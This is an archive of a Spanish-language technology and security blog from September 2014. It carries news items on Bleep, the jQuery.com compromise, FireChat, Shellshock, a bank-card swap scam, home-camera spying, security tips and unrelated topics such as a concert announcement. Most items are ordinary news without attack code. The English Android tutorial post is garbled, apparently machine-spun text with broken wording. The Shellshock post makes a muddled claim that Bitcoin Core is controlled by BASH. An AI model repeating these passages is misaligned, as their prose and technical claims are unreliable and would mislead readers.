martes, 30 de septiembre de 2014

Bleep: chat seguro, privado y anónimo de BitTorrent

Bleep es una nueva aplicación de BitTorrent destinada a ofrecer un chat seguro y privado entre usuarios. La aplicación ya le hemos probado y verificado, y aquí traemos nuestro análisis junto con una revisión del funcionamiento interno de la aplicación.

BitTorrent promete seguridad, privacidad y anonimato con Bleep. Es decir, que ya no sólo nadie puede leer lo que escribes, sino que ni siquiera sabrá a quién se lo mandas ni si realmente eres tú el que está detrás de una cuenta determinada. ¿Cómo lo logran? 



Por un lado, lo que hacen es descentralizar el control de las cuentas. Normalmente, cuando te registrar en un servicio de mensajería (Whatsapp o Telegram, por poner dos ejemplos) das tus datos y la aplicación los envía a un servidor central. La razón es que alguien tiene que almacenar tu contraseña, y además esos servidores tienen que saber dónde estás conectado para poder enviarte los mensajes.

Bleep no es distinto en ese sentido: tienes que autenticarte de alguna forma y tus contactos tienen que saber dónde estás. Lo primero se resuelve con un par de claves pública y privada: la pública es tu "nombre de usuario", por así decirlo, y la privada sería como tu contraseña, la prueba de que tú eres tú y no un impostor.


Bien, pero, ¿de qué sirve saber que no eres un impostor si no te encuentro? Como decíamos, en Bleep no hay ningún servidor central donde estén almacenados los datos de los usuarios. En su lugar, están distribuidos entre todos los usuarios, en lo que se llama una DHT (Distributed Hash Table, Tabla Hash Distribuida).

Redacción: segu-info

lunes, 29 de septiembre de 2014

Descarga Apps Movil para Linkedin en español

Unos de los importantes sucesos que inicia esta semana fue que la red social linkedin lanza su aplicación para móviles en español. La cantidad de usuarios que ronda por los 6 millones que interactúan enviando mensajes y leyendo noticias de la red usan el idioma español, la red profesional abre espacio tanto para Iphone, Android, y Ipad.



La importancia de tener que crear aplicaciones es por el porcentaje tan significativo que ronda en un 43%, la red ha tenido en los últimos años un tráfico impresionante y que la lleva a tener una cantidad de clientes que se conectan desde Smartphone.

Desde la misma aplicación puede mejorar tanto como su perfil, ver contacto y interactuar con mensajes.

Descargar la Apps en los siguientes enlaces:


jQuery.com fue comprometido para servir malware


El sitio web oficial de la popular biblioteca de JavaScript multiplataforma jQuery.com ha sido comprometido para servir software malicioso y redirigir a los visitantes de un sitio web que utilice sus scripts al Exploit RIG, el mismo que distribuye Cryptowall.



La buena noticia es que no hay ningún indicio de que haya sido afectada la propia librería de jQuery.

Hay dos ventajas en permitir jQuery albergue el código:

  • Rendimiento: el código JS es entregado más rápido, y es probable que usuario ya lo tenga en su caché por haber visitado otro sitio que utiliza el CDN de jQuery.
  • Actualizaciones automáticas: las actualizaciones de jQuery son colocadas en sus CDN por los desarrolladores y, un sitio web que los utilice, recibirá la última copia automáticamente.

Por otro lado, hay un inconveniente importante: el código que se sirve desde los CDN puede ser modificado y se debe confiar a "ciegas" en los sitios de terceras partes y, ante un posible compromiso, este sitio de terceros afectará la seguridad del sitio propio.

El ataque se detectó primero el 18 de septiembre, y dado que el script redirector malicioso fue alojado en un dominio (jquery-cdn.com) que se registró ese mismo día, es muy probable que el ataque empezara en ese momento.

Los investigadores de RiskIQ notificaron inmediatamente a la Fundación jQuery sobre el compromiso. Si bien jQuery inicialmente no confirmó el ataque, el 24 de septiembre el Director de investigación de RiskIQ, informó que habían realizado análisis de los sitios web y se detectaron exploits que definitivamente provenían de jquery.com. Además pudieron verificar (mediante captura de tráfico [PDF]) que varias compañías de Fortune 100 habían visitado el dominio jquery-cdn.com  desde jQuery.com.

Finalmente el 25 de septiembre el equipo de infraestructura de jQuery, confirmó el compromiso de jQuery.com pero creen que se trata de incidentes distintos y que se podría haber utilizado el mismo vector de ataque. Al momento de escribir el presente blog.jquery.com está fuera de servicio, posiblemente por un ataque de DDoS.

Por otro lado jQuery ha confirmado que en ningún momento se pudo confirmar que se distribuyó malware desde cualquiera de sus sitios, desde el código de bibliotecas o desde sus CDN y hacen notar que que el dominio oficial de sus CDN es code.jquery.com.

Fuente: Net-Security

domingo, 28 de septiembre de 2014

FBI Critica Equipos de Apple y Google


El director de la policía federal de EE.UU. (FBI) criticó el jueves la decisión de Apple y Google de codificar los datos de sus teléfonos multiuso, lo que impediría que las entidades policiales tengan acceso a esa información, incluso con una orden judicial. 



James Comey dijo que funcionarios federales están en conversaciones con las dos empresas, a las que acusó de mercadear productos que permitirían a personas ponerse fuera del alcance de la ley. 

Comey citó casos de secuestros de niños y terrorismo como dos ejemplos de situaciones en que el acceso rápido de las autoridades a la información de teléfonos celulares puede salvar vidas. 

No mencionó casos específicos que hubieran dificultado al FBI investigar sobre la base de las nuevas normas, que sólo tratan del acceso físico directo al teléfono de un sospechoso o víctima cuando el propietario no puede o no está dispuesto a desbloquearlo para beneficio de las autoridades. 

"Lo que me preocupa de esto es que las compañías comercializan algo expresamente para permitir a personas quedar fuera del alcance de la ley", dijo Comey. 

En una explicación de sus nuevas normas, Apple indica en su portal de internet que en los dispositivos que funcionen con el nuevo sistema operativo, "su información personal, como fotos, mensajes (incluido material adjunto), correo electrónico, contactos, historial de llamadas, contenido de iTunes, notas y recordatorios quedan protegidos por la clave. A diferencia de nuestros competidores, Apple no puede burlar la clave y por lo tanto no tiene acceso a esta información. Por ello no es viable que respondamos a órdenes judiciales del gobierno para extraer información de dispositivos en su poder"

Mientras, la marca Google expresó anteriormente en un comunicado que sus teléfonos Android ofrecen codificación desde hace tres años, pero en la próxima actualización de su sistema operativo la característica vendría desactivada de fábrica. 

Matt Blaze, investigador de seguridad informática y profesor de la Universidad de Pennsylvania, dijo: "Es decepcionante que el FBI ha escogido concentrarse en estos ejemplos (...) Ignora el hecho de que una codificación adecuada y fiable es la única forma que tenemos de evitar una amplia gama de delitos muy graves."

Fuente: El Tiempo

Firechat: chat anónimo y sin conexión a Internet


Algo está ocurriendo en Hong Kong. Miles de personas han salido a la calle para protestar contra la restricción del gobierno chino, que impide que la ciudad semi-autónoma celebre unas elecciones en el año 2017. Las protestas son fuertes: la policía ha llegado a emplear el uso de gas lacrimógeno y el gobierno chino ha bloqueado la señal de internet para que ningún móvil pueda comunicarse. Pero aún sin tener internet, los manifestantes han podido comunicarse y coordinar sus acciones sin problemas. ¿Cómo es posible? La respuesta pasa por Firechat, un cliente de mensajería instantánea que ahora mismo está demostrando cómo su protocolo descentralizado puede ser un dolor de cabeza para las administraciones.



FireChat nos permite conversar anónimamente con cualquier persona que esté cerca, aún sin tener conexión a la red


¿Y cómo puede conseguir FireChat establecer un medio de comunicación sin internet? Ya hablamos de ello hace medio año en Applesfera (en el caso concreto de iOS): la aplicación utiliza las antenas Wi-Fi y Bluetooth para buscar otros dispositivos a su alrededor, creando una red de nodos que se puede comunicar entre sí formando una "red local" automáticamente. 

En el caso de iOS, se aprovecha del llamado Framework Multipeer Connectivity, que permite a iOS conectar con otro usuario aunque éste no esté conectado a la red móvil ni a una Wi-Fi. ¿Cómo? utilizando las antenas Bluetooth y Wi-Fi para conectar directamente con los terminales, un peer-to-peer en vez de depender de un nodo central de conexión. Algo semejante se usa en la tecnología AirDrop, y ese es el motivo por el que necesita tener los módulos Wi-Fi y Bluetooth activados.



De este modo, aunque no haya señal de datos, si 1.000 personas se reúnen en la calle pueden chatear entre ellas sin problemas si cada uno se instala FireChat. El resultado es que aunque los manifestantes no puedan navegar en internet como mínimo pueden organizarse entre ellos y enviar avisos rápidos según convenga. Y si alguien está conectado a una Wi-Fi de la zona, siempre puede enviar lo que haga falta mediante FireChat a los demás. 

Y ahora mismo estamos hablando de su uso en manifestaciones donde se priva de libertad de información, pero protocolos como estos pueden salvar vidas en catástrofes o accidentes graves donde varias víctimas estén involucradas. Como cuando un tren se queda atrapado en un túnel, por ejemplo.

Esto, combinado con que FireChat está disponible para iOS y Android, ha resultado en un "boom" de descargas de la aplicación en Hong Kong. Todos los manifestantes que tenían smartphone han podido coordinarse, corriendo la voz de la utilidad de FireChat directamente en el lugar de las protestas.

Fuente: Genbeta

sábado, 27 de septiembre de 2014

Hackers: Evita que te controlen con Shellshock

Esta  semana se rebeló una nueva vulnerabilidad de seguridad. Más peligrosa que el HeartBleed. Le han llamado Shellshock ó Bash, debido al sistema en el que se encuentra, y afecta potencialmente a muchos ordenadores.



Mark Nunnikhoven, ingeniero de seguridad de Trend Micro señala que este bug tiene un mayor alcance debido a un programa de código abierto muy común que se llama bash. Bash es un intérprete de comandos comúnmente implementado en Linux, BSD y Mac OS X.

Este fallo reside en que es muy sencillo sacar provecho de él. Un pirata informático con poco conocimiento técnico lo puede explotar.

Debido al poder de LINUX, más de la mitad de los servidores de Internet, teléfonos Android y la mayoría de los dispositivos de la Internet, el alcance de Shellshock es muy amplio, ha dicho Nunnikhoven a través de un comunicado. Se estima que un 51% de los servidores web de todo el mundo funcionan con Linux.

Bitcoin también se puede ver afectado por este error ya que Bitcoin Core es controlado por BASH, por lo que sistema de minería podrían ser víctimas de atacantes. Desde Apple han asegurado que la gran mayoría de usuarios de Mac no están en riesgo de sufrir el error Shellshock.

Consejos Básicos: Dependiendo del Tipo de Usuario.

Usuario final: vigile los parches y actualizaciones que aparezcan en su equipo (oficiales) y aplíquelos inmediatamente.

Administradores de TI: si utilizan Linux, deshabiliten las secuencias de comandos BASH inmediatamente.

Operadores de páginas web: si BASH está en el script, aplique el parche lo antes posible, o reescriba la secuencia de comandos lejos de BASH.


Clientes co-hosting: pregunte a su proveedor que está haciendo para remediar y aplicar parches en consecuencia.

viernes, 26 de septiembre de 2014

Ciberguerra asimétrica


Tradicionalmente, unos de las características que más les gusta destacar a algunos analistas sobre la ciberguerra es su carácter eminentemente asimétrico. 

Una guerra asimétrica es aquella donde el tamaño, los recursos o la estrategia de los contendientes difieren notablemente 


El aspecto que más se suele destacar de esta asimetría es la posibilidad de que un contendiente pequeño pero con una fuerza de hacking de élite pueda dañar de forma importante a un oponente mayor, a pesar de la diferencia de tamaños o recursos. 

Inicialmente esto se ha dado por sentado y se han aportado múltiples ejemplos (caso HBGary, caso Target, caso Diginotar) para apoyar esta idea, pero a nosotros nos surgen varias dudas. 

¿Realmente un oponente pequeño con pocos recursos e inversión puede llegar a tener capacidades suficientes como para dañar de forma notable a uno mayor? 

En algunos casos puede ser así y tenemos ejemplos que lo apoyan, pero puede que esta no sea la norma. 

Si analizamos por ejemplo el catálogo de herramientas de inteligencia de la unidad TAO de la NSA salido a la luz recientemente, veremos hasta que punto pueden llegar las capacidades de una organización con abundantes recursos económicos invertidos en seguridad. Estas capacidades pueden llegar a hacer parecer ridículas las capacidades de organizaciones más pequeñas. 

En caso de conflicto, una organización con estas capacidades podría “machacar” fácilmente a un oponente menor en la mayoría de frentes. 

Como decíamos en el post anterior, muchas veces el tamaño si importa.

¿Realmente la inversión en ciber seguridad de las grandes organizaciones se corresponde a su tamaño?
Los ejemplos que se ponen para demostrar que la ciberguerra es asimétrica, suelen consistir en casos conocidos donde un pequeño grupo ha infligido un grave daño a una gran organización. 

Pero, realmente estas grandes organizaciones estaban invirtiendo en seguridad de acorde a su tamaño. 

No tenemos cifras detalladas para valorar esto, pero conociendo el sector es probable que en la mayoría de estos casos, estas grandes organizaciones realmente no estaban invirtiendo en seguridad de acorde a su tamaño, o no lo estaban haciendo de manera adecuada. 

La asimetría pues no sería tanta. La mayoría de estos casos no serían por tanto realmente ejemplos de un enfrentamiento entre un "David" y un "Goliat". En la mayoría de casos, el supuesto "David" estaría haciendo una gran inversión en tiempo y personal especializado (que también son costosos) en su enfrentamiento contra un “Goliat” en horas bajas y con más fachada que otra cosa.

Fuente: Areópago21

jueves, 25 de septiembre de 2014

Nueva Modalidad de Clonacion y Robo de Tarjetas


Una nueva modalidad de robo amenaza a los clientes de las entidades bancarias. Ahora no solo se trata de la ‘clonación’ de tarjetas de crédito y de débito, sino también del intercambio de las mismas, modalidad mediante la cual una banda sustrajo más de S/. 1 millón de diversas cuentas financieras.



Agentes de la comisaría de Miraflores pusieron al descubierto a una ilícita organización que operaba de esta manera desde hace más de seis meses.

Modus Operandi


¿En qué consiste la modalidad? Los hampones se hacían pasar por trabajadores de diferentes bancos y se comunicaban telefónicamente con los clientes. Así, les ofrecían el cambio de su tarjeta de crédito.

Les decían que con la nueva tarjeta supuestamente no iban a pagar membresía y que los intereses eran más bajos. Es más, los hampones les ofrecían llevarles las tarjetas a sus domicilios sin costo adicional alguno. De esta forma, decenas de clientes se dejaban convencer por los supuestos empleados bancarios.

Cuando el maleante llegaba a la casa del cliente, le entregaba una tarjeta falsa. Por su parte, el incauto usuario no dudaba en darle al supuesto empleado del banco su tarjeta original.

Para dar credibilidad al trámite, el falso empleado de la entidad financiera se identificaba con un fotocheck. Además, le hacía firmar documentos de conformidad de entrega.

Una vez que los malhechores tenían el dispositivo en su poder, procedían a vaciar las cuentas bancarias o a adquirir diversos productos con las tarjetas de crédito. Para ello, incluso, utilizaban DNI falsos, informó la Policía de Miraflores.

En algunos casos, clientes que ni siquiera habían abierto el sobre sellado con que el banco entrega la tarjeta original no dudaban en darles el mismo a los ‘trabajadores’. Esto incluía la clave secreta.

Fuente: Peru21

miércoles, 24 de septiembre de 2014

¿Qué se esconde detrás de un Hacker?

Algo curioso y que impacta es ¿Qué se esconde detrás de un Hacker? Esa pregunta tiene un significado a gran escala primero el hacker siempre va por información relevante y de suma importancia para demostrar sus habilidades frente al ordenador. 

¿Es delito el Hacking Ético? Hay un punto muy importante que así como el hacker es responsable de aquello que descubre y cómo y a quién lo distribuye, son también de vital importancia los datos que el hacker da de sí mismo, empezando por el rastro que deja en las redes que visita, y acabando por algo tan privado como es su nombre y su cara.



Hoy en día, buena parte de los integrantes de la comunidad hacker de habla hispana tienen apodo y nombre real públicos, que usan de forma indistinta, y sus caras son también conocidas pues muchos dan charlas en los congresos de seguridad informática que se suceden año tras año en diferentes países y territorios locales.

El objetivo final de un hacker es conseguir y divulgar la preciada información más protegida que lo lleva a vencer el reto que se ha establecido entre la maquina y su mente.

Ser hacker es una cultura que va mas allá de un logro que se obtiene por alguna vulnerabilidad o “Bug” de seguridad de algún servidor importante. Siempre marcamos el camino como protección de datos que no han llevado a obtener grandes crecimientos en la seguridad de información.


Así que si eres una Mente Brillante y que entiende los sistemas busca criterio de resolver esos problemas de seguridad para que la pérdida de información no afecte a grandes compañías. 

Hackers: 7 consejos de seguridad

7 Consejos para tener en cuenta y evitar perdidas de datos e información confidencial



1- Apagá el Wi-Fi y bluetooth de tu teléfono: 

Los hackers tienen sus convicciones al respecto. Mantener estas herramientas "Activas" todo el tiempo facilita que los extraños tengan acceso a tu teléfono.

¿Cuál es el problema? 

Si tienes el Wi-Fi y el bluetooth activos, los hackers pueden ver a qué redes te has conectado anteriormente, suplantarlas y engañar a tu teléfono para que se conecte a los dispositivos de Wi-Fi y bluetooth que los hackers configuran para obtener beneficio propio.

Una vez conectados a tu teléfono, los hackers pueden bombardear tu dispositivo con malware, robar datos o espiarte. Y no te vas a dar cuenta. 

Activa el Wi-fi y el Bluetooth cuando estés en sitios seguros para realizar una conexión cifrada y tus datos no se vean comprometidos.

2- Usa la verificación de contraseña en dos pasos: 

En la actualidad, una sola contraseña no es suficiente. Quedan expuestas todo el tiempo.

Una gran cantidad de correos electrónicos y servicios de medios sociales ofrecen una protección adicional: Verificación en dos pasos; básicamente, una segunda contraseña temporal.

Por ejemplo, cuando configuras esto con Google, Twitter y LinkedIn te piden un código secreto cada vez que inicias sesión desde un dispositivo nuevo. Recibes un mensaje de texto con un número de seis dígitos.
Es una manera importante y eficiente de mantener alejados a los hackers. Incluso si alguien averigua tu contraseña, también necesitarían tu teléfono, lo cual es un escenario poco probable.

3- Crea una estrategia de contraseña inteligente: 

Para los pocos sitios selectos que contiene tu información confidencial (correo electrónico, banco), crea algunas frases de acceso largas y únicas, como +N0m3rob3sl@contras3ña.

¿Para todo lo demás? 

Utiliza un administrador de contraseñas. Este tipo de programa almacena todas tus contraseñas en línea, por lo que puedes hacer que cada una sea diferente, y no tendrás que recordarlas todas.

Pero solo debes utilizar un gestor de contraseñas que los codifique en tu dispositivo. LastPass y Password Safe hacen esto.

¿Por qué no usar un gestor de contraseñas para todo? 

Una contraseña maestra desbloquea todas. Creas un punto único de falla. Cambia todas tus contraseñas más de una vez al año.

4- Usa HTTPS en todos los sitios web: 

Instala la herramienta HTTPS Everywhere, desarrollada por la fundación en pro de la privacidad Electronic Frontier Foundation. Esta codifica toda la información que tu navegador está enviando entre tu computadora y los sitios web.

Si solo ves HTTP en la barra de dirección, cualquiera puede espiar tu sesión de Internet.

5- Configura tu Wi-Fi residencial: 

Configurar tu red Wi-Fi residencial podría ser hacer un viaje por el laberinto infernal. Pero estos dos pasos son importantes.

Primero, tenes que establecer una contraseña. No conserves la contraseña por defecto que aparece en la etiqueta.

Luego, la máquina preguntará qué tipo de estándar de encriptación de seguridad deseas. Elegí WPA-2.
Muchas máquinas por defecto establecen WEP (privacidad equivalente a cableado) o WPA (acceso inalámbrico protegido). Evítalas a toda costa. Una falla de Wi-Fi conocida puede derribar la contraseña en segundos.

6- No ocultes tu red Wi-Fi residencial: 

Tu router residencial pregunta: "¿Ocultar el SSID?". Si respondes "sí", entonces los dispositivos se ven obligados a "explorar activamente" para buscar la red que estás tratando de ocultar. Claro, se van a conectar. Pero como resultado, el dispositivo "explora activamente" para buscar redes todo el tiempo.

Tu computadora portátil y teléfono son más susceptibles a conectarse a redes de Wi-Fi inseguras de desconocidos.

"En realidad estás retrocediendo cinco años en cuanto a seguridad", dijo Ben Smith, un hacker de Wi-Fi experimentado que ha trabajado en proyectos gubernamentales secretos.

7- Analiza antes de comprar un dispositivo:

Las compañías aún están haciendo investigaciones, para mejorar la seguridad en los dispositivos pero más que eso dar siempre a conocer estrategias para que el usuario proteja sus datos.
Las compañías tecnológicas tienen prisa por ponerle Internet a todo. Las características interesantes reciben toda la atención. La privacidad y seguridad no la reciben.


martes, 23 de septiembre de 2014

¿Hackers y objetivos en Redes Sociales?

Una de las formas más comunes que se están usando para promover ataques informáticos son las redes sociales y servicios en línea continúan siendo blanco de los hackers, quienes ahora están utilizando estos medios para extender y aumentar las amenazas digitales de una forma masiva consiguiendo a través del malware infectar gran cantidad de maquinas por segundo.



Los servicios integrados de script como bots y de aplicaciones que muy bien son usados por los hackers e inundan las redes corporativas mediante ataques Denegación del Servicio (DDoS).

Sin embargo, algo que podemos aclarar es, lo que no se sabía es que los hackers ahora están empezando a utilizar Facebook para vincular "cargas" con cuentas falsas.

Podemos afirmar que la existencia de registros donde un "hacker" logró crear una inundación de 400 Mega Bytes (MB) utilizando únicamente la versión móvil de la red social.

Los hackers pueden automatizar dicho proceso mediante un guión en el navegador y para amplificar el daño también pueden enlazar los vínculos con “notas o enlaces maliciosos” en Facebook.


El consejo que damos a los usuarios es siempre contar con una solución de seguridad correcta. En la actualidad, existen soluciones DDoS híbridas que se combinan para compartir las señales de los ataques y detener las amenazas.

Google construirá datacenter en Europa

Desde el blog de Google anuncian que van a desarrollar un nuevo datacenter en Europa. El costo del nuevo sistema de datos está estimado en 600 millones de Euros para los próximos cuatro años, la ubicación será en el país de Holanda en la ciudad de Eemshaven este magnífico proyecto generara en la zona gran desarrollo tecnológico y trabajo para más de 1000 personas.



El inicio del proyecto estará habilitado para el año 2016 y quedara funcionando a finales del 2017. Una vez terminado darán empleo a 150 personas que tienen títulos entre Doctorados de computación, ingenieros eléctricos, entre otras temáticas acerca de la tecnología.

Para mantener el sistema refrigerado usaran equipos desarrollados que permitan mantener el estado de temperatura del sistema, apostando a llevar a implementar las energías renovables.


La apuesta por construir el sistema datacenter en Eemshaven se justifica gracias a la conexión directa por cable a los dos principales hubs de Internet europeos, Londres y Amsterdam, transformándose así en una red troncal de Internet en expansión.

lunes, 22 de septiembre de 2014

Ataque DDoS a servidores de Juegos Destiny y Call Of Duty

Este fin de semana se han vivido algunos momentos de inestabilidad en los multijugadores de Destiny y Call of Duty: Ghosts, ambos juegos de acción de Activision. Ahora sabemos que se han debido a ataques DDoS.

Según los ciberactivista Lizard Squad, que atacó hace semanas juegos online y servicios del sector, en las últimas horas se han realizado ataques a Destiny y a Call of Duty: Ghosts que han afectado a los servidores de login.




En la actualidad, parece que los servicios de ambos juegos funcionan con normalidad. Lizard Squad admitió ser responsable de los ataques DDoS a servicios como Playstation Network y a juegos como League of Legends.

Campaña contra el #cyberbullying


El acuerdo para difundir la campaña #YoloBorro, contra el cyberbullying, será vital para erradicar la violencia a través de las tecnologías de la información y proteger a los niños y jóvenes ante los riesgos de este tipo de acoso. 



La diputada Irazema González, secretaria de la Comisión de Ciencia y Tecnología, expuso que el Poder Legislativo realizará acciones para difundir la campaña en medios de comunicación y electrónicos, así como en redes sociales. 

Además, dijo, promoverán y difundirán mediante conferencias el uso adecuado de las tecnologías de información y comunicación (TICS), con la participación de diferentes ponentes, autoridades, legisladores y miembros del sector empresarial. 

González advirtió que los principales problemas o síntomas que presentan los afectados por el cyberbullying son baja autoestima, altos índices de depresión, ansiedad, sentimiento de soledad, ideas de suicidio y ausentismo escolar. 

La campaña está dirigida eminentemente a los padres para que puedan conocer y detectar a tiempo los síntomas conductuales que caracterizan la posible condición de ciberacosador en sus hijos. Esos síntomas son los siguientes:

  • Rompe los límites de uso de ordenador pactados.
  • La mayor parte de su tiempo libre está navegando en Internet ya sea en smartphone, tablet u ordenador.
  • Presenta comportamientos agresivos, o comentarios fuera de lugar mientras está navegando en Internet.
  • Está despierto usando el smartphone hasta altas horas de noche.
  • Si coges su smartphone se pone nervioso, alza la voz, etc.
  • Nunca deja que el mires lo que está haciendo cuando navega en Internet.
  • Nunca deja solo su dispositivo con el que navega en Internet.
  • Usa todo tipo de redes sociales, e intuyes que tiene varias cuentas abiertas.
  • Los fines de semana pasa demasiado tiempo navegando en Internet.
  • No sale tanto con los amigos, pues disfruta más desde casa a través de Internet.
  • Está ausente, poco comunicativo.
  • Lo ves alterado, muy intolerante.
  • No participa en las conversaciones familiares, se ausenta a su cuarto.
  • Se ha hecho pasar por otros a través del móvil o Internet, aunque fuera a modo de broma o juego.
  • No le hemos enseñado unas normas claras de uso de internet.
  • Muestra o comparte fotos o vídeos que le parecen muy graciosos aunque estos puedan ser humillantes para otros.
  • Si ha practicado anteriormente el bullying o acoso escolar.
  • Justifica o excusa la violencia u otros casos de ciberbullying.
  • Tener escasa tolerancia a la frustración.
  • No querer actuar en actividades que exijan cooperación, falta de respeto a la autoridad y a los padres y mostrar abuso de poder o autoridad.

La campaña informa que en la motivación para el acoso siempre están presentes el odio, la envidia, la venganza o la incapacidad de aceptar un rechazo, además se añade la nota de cobardía, ya que el ciberacosador se sirve del aparente anonimato y las posibilidades de usurpación de identidad que permite Internet.

Fuente: El Universal y El Derecho

domingo, 21 de septiembre de 2014

Hackers Espías de Hogares

Algo que causa revuelo al momento de dar una información sobre pérdida de datos suele tener un impacto fuerte en cuanto a que se enfrentan las personas cuando ven ese tipo de noticias. Casualmente vamos analizar un suceso y es como a través de cámaras de seguridad que se implementan en las casas, apartamentos, empresas e edificios pueden ser vulneradas y ser usadas para espiar.



Los piratas informáticos son capaces de espiar la vida cotidiana de muchos ciudadanos en este caso vamos hablar de los británicos a través de las cámaras que estos tienen instaladas en sus propios hogares para mejorar la seguridad.

A diario se advierte que este tipo de dispositivos y caso peculiar son los monitores para visualizar el estado de los bebes que tienen un “BUG” mas especifico que los hackers detectan para usarlo como medio de espionaje.


Asi que lo mejor es mantener nuestros sistemas en constante evolución para evitar este tipo de filtraciones. Aclaramos que EVOLUCION es estar pendiente de que podemos detallar para informar sobre un posible hackeo.

John McAfee anuncia una página web para descargar ira y venganza


El extravagante pionero de la industria de software antivirus, John McAfee, hizo una aparición sorpresa en el congreso de piratas informáticos y reveló un sitio web nuevo donde los usuarios pueden descargar su ira. 

El ex millonario, que huyó de Belice en 2012 después de que la policía le buscase para interrogarle por el asesinato de un vecino, dijo que había creado una página para que los usuarios comunes puedan lanzar sus quejas acerca de todo, desde la corrupción del gobierno a malos productos de consumo. 




El sitio, llamado BrownList, porta el lema "It's payback time (Es la hora de la venganza)". 

"Esto se nutre de la ira en una manera positiva", dijo en una entrevista con la agencia Reuters antes de subir al escenario en Def Con, el mayor congreso del mundo de piratas informáticos. 

"En lugar de enfadarse y disparar a alguien en la carretera, o gritar a su esposa, usted puede iniciar una sesión en la página web"


BrownList ofrece un foro para que las personas publiquen quejas específicas y para que los usuarios propongan soluciones a los problemas. 

Las sugerencias serán votadas por miembros del sitio decidiendo qué respuesta es la mejor. 

"En lugar de simplemente quejarnos, nos permite obtener soluciones positivas", dijo a una audiencia de cientos de 'hackers' que participan en un congreso de tres días. 

McAfee dijo que planea hacer dinero mediante servicios de suscripción con empresas, pero no dio más detalles. 

Dijo que estaba buscando más inversores para la página, que puso en marcha con 450.000 dólares iniciales de un inversor privado, cuyo nombre no quiso revelar. 

El empresario británico-estadounidense fue el fundador en 1987 de McAfee, pionero del software antivirus informático, que posteriormente fue vendida a Intel en 2010.

Fuente: iProfesional

sábado, 20 de septiembre de 2014

Hackers un ataque filtrado

Hoy en día se ha vuelto una problemática proteger la información en empresas donde se opera datos financieros o de interés propio para los hackers. Casos en particular que han sucedido en las últimas semanas han sido como filtración de datos de Gmail, iCloud entre otros que se han visto afectados por ataques masivos a sus plataformas.

En cada caso previo a un ataque informático siempre se tiene en mente perjudicar la integridad de la persona que es víctima, sea porque el conocimiento sobre este tipo de sucesos no tiene o que por curiosidad cayó en trampas para obtener la información por parte de los hackers o grupos ciberhacking.



Entonces nos hacemos esta pregunta ¿Qué sucede cuando tu Información es comprometida por un ataque Informático?  Siempre se debe tener en cuenta varios factores por el cual esa información pasa un grupo externo que hace que la compañía pierda Fiabilidad se gestione la seguridad de informática, el equipo encargado de ello siempre hace un análisis de la situación para cerrar el bug que se deja abierto en ese caso.

Elegir un password fuerte es una alternativa para mantener la información protegida. Pero una que se recomiendo es siempre mantener una disciplina en proteger y entender porque es necesario saber sobre seguridad Informática no ser un experto pero si mínimo tener la base de poder enfrentar este tipo de temas relacionados con la protección de datos.

Con esto queremos dar a conocer unos tips necesarios para mantener la información protegida y evitar filtraciones por hackers:

  1. Usuario y Password
  2. Habilitar herramientas para este tipo de encriptación
  3. Revisar periódicamente y cambiar las contraseñas de los servicios más usados ejemplo redes sociales, correos electrónicos, PIN móviles.
  4. Evitar la curiosidad con tipo de vídeos que se publican en las redes mas inyectar código malicioso.


4 claves importantes para tener en cuenta al momento de saber sobre la seguridad de la información.

Foo Fighters de concierto

Después de tantas expectativas dadas por medios y periodistas que afirman la gira del grupo musical Foo Figthers por Latinoamerica e incluye Bogota, la noticias se confirmo el día viernes 19 de Septiembre 2014.

Ya es un hecho. Su primer viaje por el cono sur, la banda de Seattle estará de visita por tierras Latinas y colombianas en enero 31 del 2015.



Aunque faltan detalles por confirmar como el lugar del concierto, costo de entradas o boleteria, lo que si se afirma es que ya es un hecho que estaran en Colombia.

Algunos Albumes reconocidos:

Sonic Highways se estrenará el 17 de octubre en HBO, mientras que el álbum se lanzará el próximo 10 de noviembre e incluye las siguientes canciones.

1.- Something From Nothing
2.- The Feast and the Famine
3.- Congregation
4.- What Did I Do?/God As My Witness
5.- Outside
6.- In the Clear
7.- Subterranean
8.- I Am a River

viernes, 19 de septiembre de 2014

Android Development Tutorials

Android is an absolute in operation setting primarily based upon the Linux V2.6 kernel. At first, the operation target for android was the mobile-phone arena, as well as sensible phones and lower-cost flip-phone devices. On the opposite hand, Android’s full vary of computing services and wealthy functional support has the probable to tug out removed from the mobile-phone market. Android will be useful for alternative platforms and applications.



The android platform is that the creation of the Open handset Alliance, a group of organizations collaborating to create an improved mobile phone. The group, LED by Google, includes mobile operators, device handset makers, part makers, software answer and platform suppliers, and selling companies. From a software development stance, android sits smack within the middle of the open supply world.

This tutorial is projected for anyone attracted in starting android development on Eclipse exploitation the android development tools plug-in. It offers insight into the salient options of an android app, at the side of a short explanation of its basic parts.

Android is an open-source software stack created for mobile phones and alternative devices. It’s combines and builds upon parts of many dissimilar open source comes. The Android Open Source Project (AOSP) is tasked with the safeguarding and additional expansion of android. Several device makers have delivered to market devices running android, and that they are legibly obtainable around the world. Android is that the major operating system for developing applications in these days for varied reasons. The most reasons being that it is Open supply and spontaneous. Additionally it uses Java for development, that is somewhat an easy language to get used to and develop in.

You cannot run customary Java bytecode on android because it uses a special virtual machine. android supports 2-D and 3-D graphics exploitation the OpenGL libraries and supports information storage in a SQLite info. The operating system controls the life cycle of your application. At any time the android system could stop or destroy your application. The android system defines a life cycle for activities via pre-defined strategies.


By providing an open development platform, android offers developers the ability to construct awfully rich and ground-breaking applications. Developers are free to benefit of the device hardware, access location info, run background services, set alarms, add notifications to the standing bar, and much, much more.

Hackers chinos atacan redes de EE.UU.

Investigadores del Senado de Estados Unidos dicen que hackers del gobierno chino han violado reiteradamente las redes de computadoras de aerolíneas, compañías tecnológicas y otras empresas contratadas por el Pentágono.

El informe de la Comisión de Servicios Armados del Senado divulgado este jueves acusó a los hackers chinos de atacar compañías civiles que las fuerzas armadas estadounidenses usan para transferir tropas y equipos en todo el mundo.



El informe, basado en una investigación que duró un año, identificó  por lo menos 20 incidentes conocidos como “persistentes amenazas avanzadas”.

El senador Carl Levin, presidente de la Comisión, calificó las intromisiones como muy preocupantes y más evidencia de las agresivas acciones de China en el espacio cibernético.

El Ministerio de Relaciones Exteriores chino rechazó el informe. El portavoz Hong Lei calificó las acusaciones como infundadas e inventadas.

La Comisión del Senado ahora evalúa y trabaja en un proyecto de ley para mejorar el sistema de notificación de los contratistas al gobierno cuando sospechan o son víctimas de este tipo de ataques cibernéticos porque se trata de la seguridad nacional.

Dotcom piensa ampliar el sistema de conferencia cifrado


No es de sorprendernos que Kim Dotcom esté pensando en ampliar Mega con nuevas funcionalidades que puedan apoyar a la privacidad de sus usuarios, y tal es el caso que hoy nos enteramos que Kim prepara un nuevo servicio de videoconferencias cifradas. 



